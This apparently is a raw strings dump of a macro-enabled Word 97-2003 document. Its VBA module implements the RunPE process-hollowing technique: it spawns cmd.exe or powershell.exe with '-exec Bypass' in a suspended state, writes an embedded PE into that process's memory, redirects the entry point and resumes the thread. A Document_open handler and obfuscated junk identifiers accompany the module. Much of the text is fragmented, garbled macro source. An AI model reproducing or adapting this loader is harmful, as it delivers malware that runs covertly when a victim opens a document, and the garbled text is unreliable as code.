LPSTR   lpDesktop;^
LPSTR   lpTitle;
DWORD   dwX;
DWORD   dwY;
DWORD   dwXSize;
DWORD   dwYSize;
DWORD   dwXCountChars;
DWORD   dwYCountChars;
DWORD   dwFillAttribute;
DWORD   dwFlags;
WORD    wShowWindow;
WORD    cbReserved2;
LPBYTE  lpReserved2;
HANDLE  hStdInput;^
HANDLE  hStdOutput;
HANDLE  hStdError;p
 https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.html
DWORD   ControlWord;
DWORD   StatusWord;
DWORD   TagWord;
DWORD   ErrorOffset;
DWORD   ErrorSelector;
DWORD   DataOffset;
DWORD   DataSelector;
BYTE    RegisterArea[SIZE_OF_80387_REGISTERS];^
DWORD   Spare0;
 Register parameter home addresses^
DWORD64 P1Home;
DWORD64 P2Home;
DWORD64 P3Home;
DWORD64 P4Home;
DWORD64 P5Home;
DWORD64 P6Home;
 Control flags
DWORD ContextFlags;
DWORD MxCsr;
 Segment Registers and processor flags
WORD   SegCs;
WORD   SegDs;
WORD   SegEs;
WORD   SegFs;
WORD   SegGs;
WORD   SegSs;
DWORD EFlags;
 Debug registers
DWORD64 Dr0;
DWORD64 Dr1;
DWORD64 Dr2;
DWORD64 Dr3;
DWORD64 Dr6;
DWORD64 Dr7;
 Integer registers^
DWORD64 Rax;
DWORD64 Rcx;
DWORD64 Rdx;
DWORD64 Rbx;
DWORD64 Rsp;
DWORD64 Rbp;
DWORD64 Rsi;
DWORD64 Rdi;
DWORD64 R8;
DWORD64 R9;
DWORD64 R10;
DWORD64 R11;
DWORD64 R12;
DWORD64 R13;
DWORD64 R14;
DWORD64 R15;
 Program counter
DWORD64 Rip
 Floating point state
M128A Header[2];
M128A Legacy[8];
M128A Xmm0;
M128A Xmm1;
M128A Xmm2;
M128A Xmm3;
M128A Xmm4;
M128A Xmm5;
M128A Xmm6;
M128A Xmm7;
M128A Xmm8;
M128A Xmm9;
M128A Xmm10;
M128A Xmm11;
M128A Xmm12;
M128A Xmm13;
M128A Xmm14;
M128A Xmm15;
 Vector registers
M128A VectorRegister[26];
DWORD64 VectorControl;
 Special debug control registers
DWORD64 DebugControl;
DWORD64 LastBranchToRip;
DWORD64 LastBranchFromRip;^
DWORD64 LastExceptionToRip;
DWORD64 LastExceptionFromRip;
 https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspx
DWORD ContextFlags;
DWORD   Dr0;
DWORD   Dr1;
DWORD   Dr2;
DWORD   Dr3;
DWORD   Dr6;
DWORD   Dr7;
FLOATING_SAVE_AREA FloatSave;
DWORD   SegGs;
DWORD   SegFs;
DWORD   SegEs;
DWORD   SegDs;
DWORD   Edi;
DWORD   Esi;
DWORD   Ebx;
DWORD   Edx;
DWORD   Ecx;
DWORD   Eax;
DWORD   Ebp;
DWORD   Eip;
DWORD   SegCs;  // MUST BE SANITIZED
DWORD   EFlags; // MUST BE SANITIZED
DWORD   Esp;
DWORD   SegSs;
BYTE    ExtendedRegisters[MAXIMUM_SUPPORTED_EXTENSION];
 ================================================================================
                   ~~~ CONSTANTS USED IN WINDOWS API CALLS ~~~
 ================================================================================
 ================================================================================
                     ~~~ CONSTANTS USED IN THE MAIN SUB ~~~
 ================================================================================
0x5A4D      // MZ
0x00004550  // PE00
32 bits PE (IMAGE_NT_HEADERS.IMAGE_FILE_HEADER.Machine)
64 bits PE (IMAGE_NT_HEADERS.IMAGE_FILE_HEADER.Machine)
 ================================================================================
                                ~~~ HELPERS ~~~
 ================================================================================
 --------------------------------------------------------------------------------
 Method:    ByteArrayLength
 Desc:      Returns the length of a Byte array
 Arguments: baBytes - An array of Bytes
 Returns:   The size of the array as a Long
 --------------------------------------------------------------------------------
 --------------------------------------------------------------------------------
 Method:    ByteArrayToString
 Desc:      Converts an array of Bytes to a String
 Arguments: baBytes - An array of Bytes
 Returns:   The String representation of the Byte array
 --------------------------------------------------------------------------------
 --------------------------------------------------------------------------------
 Method:    FileToByteArray
 Desc:      Reads a file as a Byte array
 Arguments: strFilename - Fullname of the file as a String (ex:
                'C:\Windows\System32\cmd.exe')
 Returns:   The content of the file as a Byte array
 --------------------------------------------------------------------------------
 File content to String
 String to Byte array
 --------------------------------------------------------------------------------
 Method:    StringToByteArray
 Desc:      Convert a String to a Byte array
 Arguments: strContent - Input String representing the PE
 Returns:   The content of the String as a Byte array
 --------------------------------------------------------------------------------
 String to Byte array
 --------------------------------------------------------------------------------
 Method:    A
 Desc:      Append a Char to a String.
 Arguments: strA - Input String. E.g.: "AAA"
            bChar - Input Char as a Byte. E.g.: 66 or &H42
 Returns:   The concatenation of the String and the Char. E.g.: "AAAB"
 --------------------------------------------------------------------------------
 --------------------------------------------------------------------------------
 Method:    B
 Desc:      Append a String to another String.
 Arguments: strA - Input String 1. E.g.: "AAAA"
            strB - Input String 2. E.g.: "BBBB"
 Returns:   The concatenation of the two Strings. E.g.: "AAAABBBB"
 --------------------------------------------------------------------------------
 ================================================================================
                                ~~~ EMBEDDED PE ~~~
 ================================================================================
 CODE GENRATED BY PE2VBA
 ================================================================================
                                   ~~~ MAIN ~~~
 ================================================================================
 --------------------------------------------------------------------------------
 Method:    RunPE
 Desc:      Main method. Executes a PE from the memory of Word/Excel
 Arguments: baImage - A Byte array representing a PE file
            strArguments - A String representing the command line arguments
 Returns:   N/A
 --------------------------------------------------------------------------------
 Populate IMAGE_DOS_HEADER structure
 |__ IMAGE_DOS_HEADER size is 64 (0x40)
 Check Magic Number (i.e. is it a PE file?)
 |__ Magic number = 0x5A4D or 23117 or 'MZ'
[+] |__ Magic number is OK.
[-] |__ Input file is not a valid PE.
 Populate IMAGE_NT_HEADERS structure
 |__ IMAGE_NT_HEADERS start at offset DOSHeader->e_lfanew
 |__ IMAGE_NT_HEADERS size is 248 (0xf8) (32 bits)
 |__ IMAGE_NT_HEADERS size is 264 (0x108) (64 bits)
 Check NT headers Signature
 |__ NT Header Signature = 'PE00' or 0x00004550 or 17744
[+] |__ NT Header Signature is valid.
[-] |__ NT Header Signature is not valid.
 Check CPU architecture
[*] |__ Machine type: 0x 
[-] You're trying to inject a 32 bits binary into a 64 bits process!
[-] You're trying to inject a 64 bits binary into a 32 bits process!
 Get the path of the current process executable
 Allocate memory to store the path
 Remove NULL bytes
[*] Current process: ' 
 Create new process in suspended state
[-] Process creation failed.
[+] Created new process in suspended state.
 Get Thread context of the new process
 |__ CONTEXT_FULL - Identifier to use to get all the thread's important registers
[-] |__ Couldn't get thread context.
[+] |__ Got thread context
 Get image base address of the new process
 |__ Image base address is CONTEXT.ebx + 8 (32 bits)
 |__ Image base address is CONTEXT.rdx + 16 (64 bits)
[-] |__ Couldn't read image base address.
[+] |__ Got image base address: 0x 
 Allocate memory for the source image in the new process
[-] Couldn't allocate memory for the source image
[+] Allocated memory for the source image at address: 0x 
 Write PE headers at the beginning of the allocated buffer[
[*] Writing PE headers
[-] Error: 'WriteProcessMemory'
[+] Wrote PE Headers at: 0x
 (size:
 Write sections of the PE to the allocated buffer
 Nth section is at offset:
  0 (image base)
  + DOSHeader->e_lfanew  NT headers base address
  + 248 OR 264           IMAGE_NT_HEADERS size is 248 (32 bits) or 264 (64 bits)
  + N * 40               IMAGE_SECTION_HEADER is 40 (32 & 64 bits) 
[*] Writing section '
[*] |__ Image base: 0x 
[*] |__ Section virtual address: 0x
[*] |__ New address (base+virt.): 0x 
[*] |__ Raw data address (buffer): 0x
[*] |__ Section size:
[-] Error: 'WriteProcessMemory'
[+] Wrote section '
' at address 0x
 (size:
 Referencing new image base address in thread context
[*] Modifying context to point to new image base
[*] |__ Where to write new image base address: 0x
[*] |__ Image base address: 0x 
[-] Error: 'WriteProcessMemory'
[+] Wrote image base address 0x
 at address 0x
 Set entry point
[*] Applying new context
[*] |__ Set new entry point: 0x
 Set the context to the new thread]
[-] |__ Couldn't apply context to the new thread
[+] |__ Applied context to the new thread
 Resume thread
 |__ If ResumeThread succeeds, the return value is the thread's previous suspend count (i.e. 1 in this case)
[*] Resuming suspended process
[+] |__ RunPE complete, successfully resumed thread
[-] |__ Resume thread failed
================================================================================
strSrcFile = "C:\Windows\System32\cmd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
strSrcFile = "C:\Windows\SysWOW64\cmd.exe"
strSrcFile = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
-exec Bypass'
' doesn't exist.
[+] Source file: ' 
[*] |__ Command line:  
[+] Source file: embedded PE
Attribut
e VB_Nam
e = "New
Macros"
Option
 Explici"t
MPORT WI
NDOWS AP
I FUNCTIpONS 
If Win64
O Priva
clare Pt
rSafe Su
b RtlMov
eMemory 
Lib "KER
NEL32" (
ByVal lD@estina
A@s Long
sSourc
1GetMod
uleFile
KAlias "
YProc|es
G+lxpAp
pCommand
>Th@)d
bInherit
pEnviron
mentR!Cur
Direct
;lpStar
tupInfoA
STARTUPI`NFO, 
mFRPROCES
#Conte
CONTEXT
Readd8
tpBas`eAddr!P@
ulpBuffe
erOfByte
alAllocE
$uExiPtCodB&I
xS/x/x/x"x
OwOw`tOw
?v~ ?v
^?v(@C
?U?U@F Op
pnd |IfQ
~~ WINDO
WS STRUC
TURES 
SConst
ants use
d in str
ucture d
efiniti
Privat
0 IMAG
E_NUMBER
OF_DIREC
TORY_ENT
RT_NAME 
MUM_SUPP
ED_EXTE NSION
87_REGIS
#If Wi
n64 Then
 M128A
Low As L
	 'U0LONG
tps://ww
w.nirsof
t.net/ke rnel_Cd/v
i@j/C^DOS_
HEADER.hxtmlGC
D*e@_magicA*I
nteger
'WORD 
E6@e_cblp
minallo
$s	$sumr
povno:
es(4 - 1
msdn.mi
fr-fr/li
brary/wi
ndows/de
sktop/ms
05(v=v
s.85).as
VirtualA
NumberOf
 TimeD
sSt|am":o
ZrToSy
mbolTabl
alHe|ad0d`ry
Charac
ter mic
4/e0n-us
439GO%
Verss@
BaseO~f
$OAlig
nment/
ratingSy
stemX2
ers As L
\Size@OfHead
Subsyste
HIntegerk
llCharac
teristic?
ackReser
'ULO|NG
NumberOf
RvaAnd
irectory
(IMAGE_N
UMBEROF_
DIRECTOR
Y_ENTRIE
S - 1)Al
Magi~c
ajorLink
	0Byte
'B8YTE
Initial
ddressOf
EntryPoi>n
@SAlignme
h	Fil>e
eratingS
 Win32
nd@ If
ttps://m
sdn.micr
osoft.co
m/fr-fr/
library/
windows/
desktop
680336(v
=vs.85).
PrXiva
_HEADERS
Spqatur
www.niBr
el_strucHt/v
SHORT_NA
'UCHxAR 
Virtual
SizeOfRa
wData;
Pointe
 As 0Long
'U`LONG 
location
enumber
ger  'WO
?@Charac
>End Typ
ttps://m
sdn.micr
osoft.co
m/fr-fr/
library/
windows/
desktop
684873(v
=vs.85).
Pr ivate
ROCESS_I
NFORMATI
hProcdes
HANDLE 
KhThread;
O en-us
OSTART
pReserve!
XCount
BYTE  
hStdInpu
Error]
www.nir
net/ker
nel_stru
VE_AREA.phtml
ontrolWo~rK
Offs~e
elect7
(SIZE_OF
_80387_R
EGISTERS  - 1)
CONTEXBT
/#If  K6
4 Then3
 home ad$dr
UAEe	w
MxC~s6[
Z	S@egment
 Debug r
?DrvJo?
4 Dr7;
' Inte
ger regi sters
x As Lon
'DWO`RD64 
RRc)tcx	:d):d
uTsp	Xb)
ogram co*u
' Float
ing poin
t state
Header(2  - 1)!
M1h28A+
Legac(y(8
IVec\to/
' Specia
l debugpT
ranchToR?
Exceptio
[	#Els
' https:
//msdn.m
icrosoft
.com/en-
us/libra
ry/windo
ws/deskt
4(v=vs.8
5).aspxwl
extFlag
yD|DrRD
yDD>rRD
FLOATIN
G_SAVE_A
 SegCs; 
 // MUST
 BE SANI
EFlags 
As Long
'DWORD
<Exten
dedRegis
ters(MAX
IMUM_SUP
PORTED_E
XTENSION  - 1)
te 'BYTEU
End If
~~~ CON
STANTS U
SED IN W
INDOWS A
PI CALLS
riva@QCon
st MEM_C
OMMIT = @&H1000
R@ESERVE
PAGE_RE`ADWRI
EXECUT
AX_PAT
SUSPEND
_FULvLB.A77
|THE MAq@~SUB
4DOS_SI@GNATUR
PEOK#	FIL
E_MACHIN@E_I386
32 bit@s PE (
MERS.h
Machine)
`Z#If Win
ayLength!
Returns  the l
Argument
' size
ic FunctXionr
On EPrror
2UBound%
ayToStri
 @repres
 Dim stXrRe
 ""S!a
Intege
	=e	& 
"h.File
-Fu<ll
C  (8ex:
:\`wdows\
md.exe'@
= Free
OpenQ.
5Binary @Access
= Space(7
Close4
bFromUnixcod
 baFileC
ontent
End Func
Met hod: 
ringToBy
teArray
vert a 
. Argum
 -  Input
7re0pres
n t he PE
, vbFro
mUnicode
a Char[
 E.g.: "pAAA"
or &H42
c@{naA
?no@+rddq
@g 1I0
C(N?BE?+a
~~~ EMBE
CODE @GENRAT
= "@Ha
CMain m
8xecute
[Word/`Excel
eb@aImage@BA
b comma`cli<ne
blic Sub
(ByRef
' PopulA
IMAGE_DO
S_HEADER)
s 64 (0x<40T
Long Ptr: 
= xVar`
all RtlMPoveMr"(
"(0)),
Check 
(i.e.a
2311B7
SIGNAT8URE
Nnt `("[+]
>%NT$%SW?%7%Z
_lfanew
A)f8) (32
 bits*
SIZEOF_
A0NT &h
E00'!/0x0!
	/0!(  /0
aQP?U1
chitectu re
bug.Prin
t ("[*] @|__ Ma
e type: 
0x" + He
x(struct
NTHeader@s.File
Win64 Th<en
 IMAGE_F
ILE_MACH
INE_I386
g to inj
 a 32 b
ocess!"
Exit S
bEnd I
 Get the
 path of
 executaDbl
pace(MAX
_PATH) '
 Allocat
e memo
+ModuleA
(d0,P/, 
lChar) -
<R@:ve 
NULL byt\es
	' Cre
spended` 
jInfor@mationa
ROCESS_I
NFORMATI
" D&Arg
Zs, 0&	c
Fa@~, CR
EATE_SUS
PENDED
$d> [@
d conte<xt
NTEXT_F
- Id@.ifi$er
's impor
+ouldn't/B(
%image
!addrW`{
.ebx0?
= hVar@
, SIZEO
F_ADDR
]A>in2
@&@irtual
@SizeOf
 MEM_COM8MIT
p$ER VE, P
?(' Wr
 buffet\
 VarPtr(
baImage(
0)), str
uctNTHea
ders.Opt ional
<.S izeOf
p, @0&)
f lWrite
ProcessM
emory = 
0 Then
Debug.Pr
int ("[-
] Error:d '
all Termhina
tI@nforma
L+] Wro@te PE 
at: 0x" b+
zEnd If
qs of t2h
d buffe
Dim iC
	MAGE_S
ECTION_H EADER
'.Numbe
' Nth1EI is
->e_lf
anew  NT
248 O`R 264A#
SNTDRS 
(32 bit
N * 40
RtlMov
"+ SIZ
= ByteA
rrayToc
lNxewAC=a
RawData
itin:gFc'
us, h/NB0
BModify
NWhere
ADDRES
	' Set 
entry 
eadConte
xt = Set
uctProce
ssInform
ation.h
0` Then
ebug.Pri
nt ("[-]
 |__ Cou
ldn't ap ply c
 the new
l Termin8ate
DExit S
End If
' Resume?
ucceeds,
e retur
n value 
previous
i.e. 1 
(As Lo
P@ublic 
Exploit(
SrcF@! y
rg \nts
XBytdq
 "C:\Win
dows\Sys
tem32\cm
d.exe"
PowerSh
ell\v1.0t\p
 Bypass
-= PE!F!Ng`l
+ "' doe
exist.
Source f
W@&AYTo
Array	*
"@embedd 
MajorSubsystemVersion`
MinorSubsystemVersion
Win32VersionValue
SizeOfImage}
SizeOfHeaders
CheckSum%
Subsystem^
DllCharacteristics,
SizeOfStackReserve
SizeOfStackCommit
SizeOfHeapReserve
SizeOfHeapCommitT+
LoaderFlags6
NumberOfRvaAndSizes
DataDirectory\
BaseOfData
IMAGE_NT_HEADERS
SignatureDS
FileHeader
OptionalHeader5a
IMAGE_SECTION_HEADER
SecName
SizeOfRawData
PointerToRawData
PointerToRelocations
PointerToLinenumbersOg
NumberOfRelocations
NumberOfLinenumbers<
dwProcessId$
dwThreadId
lpReserved
lpDesktop
lpTitle
dwXSize
dwYSize
dwXCountChars
dwYCountChars
dwFillAttribute$g
dwFlags/
wShowWindow
cbReserved2
lpReserved2
hStdInput]
hStdOutput
hStdError0
FLOATING_SAVE_AREAd
ControlWordEr
StatusWord
TagWord
ErrorOffsetI
ErrorSelector8
DataOffset
DataSelectorJ
RegisterArea+
Spare0
P1Homer@
P2Home
P3HomeMd
P4HomeZ
P5Home(
P6Home
ContextFlags
SegGs=
EFlags
Header
Legacy
VectorRegisterj
VectorControl
DebugControl
LastBranchToRip
LastBranchFromRip
LastExceptionToRipk-
LastExceptionFromRip
FloatSaveQ
ExtendedRegisters
MEM_COMMITr]
MEM_RESERVEj
PAGE_READWRITE
PAGE_EXECUTE_READWRITE
MAX_PATH
CREATE_SUSPENDED"
CONTEXT_FULL
IMAGE_DOS_SIGNATURE>
IMAGE_NT_SIGNATURE
IMAGE_FILE_MACHINE_I386
IMAGE_FILE_MACHINE_AMD64d_
SIZEOF_IMAGE_SECTION_HEADER
SIZEOF_IMAGE_NT_HEADERS
SIZEOF_ADDRESS
ByteArrayLength*
baBytes
ByteArrayToString,
strRes
iCount
FileToByteArray
strFilename
strFileContent
iFile0
FileLen
baFileContent
StrConvx'
vbFromUnicode0
StringToByteArrayK
strContent%
baContent
strAV5
strBW5
gkjfsgksjkasoiopfajvd
sgsdkjabjkajhabvjkhabvlkadnkjanvkjabv,
baImage
strArguments
structDOSHeader	
ptrDOSHeaderGM
VarPtrb
structNTHeaders
ptrNTHeaders|
strCurrentFilePath
lGetModuleFileName
vbNullChar
strNull
structProcessInformation@
structStartupInfo9
lCreateProcess/
structContext
lGetThreadContext
lImageBase
lImageBaseAddrLocation
ptrImageBaseu
lReadProcessMemory
lProcessImageBaseD
0	,Ady
Win64x
Project-
stdole
Normal
Office
ThisDocument<
_Evaluate
RtlMoveMemory
lDestination
sSource
lLength1
KERNEL32_
GetModuleFileName
hModule
lpFilename
nSize}
CreateProcess;r
lpApplicationName
lpCommandLine
lpProcessAttributes`
lpThreadAttributes
bInheritHandles
dwCreationFlags
lpEnvironmentp
lpCurrentDirectoryE
lpStartupInfo
STARTUPINFO
lpProcessInformationui
PROCESS_INFORMATION
GetThreadContext
hThread
lpContext@|
CONTEXTXn
ReadProcessMemoryh
hProcess
lpBaseAddress
lpBuffer>
lpNumberOfBytesRead
VirtualAllocExc
lpAddress
dwSize1
flAllocationType
flProtect
WriteProcessMemory
lpNumberOfBytesWrittenX9
SetThreadContext
ResumeThread
TerminateProcess
uExitCode
IMAGE_NUMBEROF_DIRECTORY_ENTRIES
IMAGE_SIZEOF_SHORT_NAME<-
MAXIMUM_SUPPORTED_EXTENSIONO"
SIZE_OF_80387_REGISTERSs
LongLong
IMAGE_DOS_HEADER`
e_magic
e_cblp
e_crlc^
e_cparhdr)
e_minalloc
e_maxalloc
e_csum
e_lfarlc
e_ovno
e_oemid7~
e_oeminfoR
e_res2
e_lfanew
IMAGE_DATA_DIRECTORY}
VirtualAddressR
IMAGE_FILE_HEADER}n
Machine
NumberOfSectionsm
TimeDateStamp
PointerToSymbolTable5
NumberOfSymbolse
SizeOfOptionalHeader"
CharacteristicsQ
IMAGE_OPTIONAL_HEADER$
Magic/
MajorLinkerVersion
MinorLinkerVersionvt
SizeOfCode
SizeOfInitializedData
SizeOfUninitializedData
AddressOfEntryPoint
BaseOfCode?$
ImageBase
SectionAlignment
FileAlignment-Z
MajorOperatingSystemVersionD
MinorOperatingSystemVersion
MajorImageVersion
MinorImageVersio.
lWriteProcessMemory
structSectionHeader
ptrSectionHeader
strSectionName
lNewAddress
lAddrLocation
lEntryPoint60
lSetThreadContext
lResumeThread-
Document_close7\
Fkjhdksjjgjksv
HJNLksdjbjksvajklvnhjksdnjks,
strComputer
strListd
objWMIService
objProcess
colProcess
GetObjectz
ExecQuery
CommandLine
Document_open
objPicaj
ActiveDocument
Shapes
PictureFormat
Brightness`
Contrast
CropLeft3
CropBottom
NewMacros
strPENa
Exploit
strSrcFile
Documentj
4\MSO.DL
 Li`brary
fThisDoc
umentG
!QRJ"B
ThisDocument
NewMacros
ID="{6ABC7C7E-24B3-477D-B478-827C3C33022F}"
Document=ThisDocument/&H00000000
Module=NewMacros
Name="Project"
HelpContextID="P
VersionCompatible32="393222000"
CMG="6E6CB00AB00AF40EF40EF40EF40E"
DPB="AEAC70CAF04A314B314B31"
GC="EEEC308A308A718B718B8E"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=26, 26, 1176, 547, 
NewMacros=0, 0, 0, 0, C
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8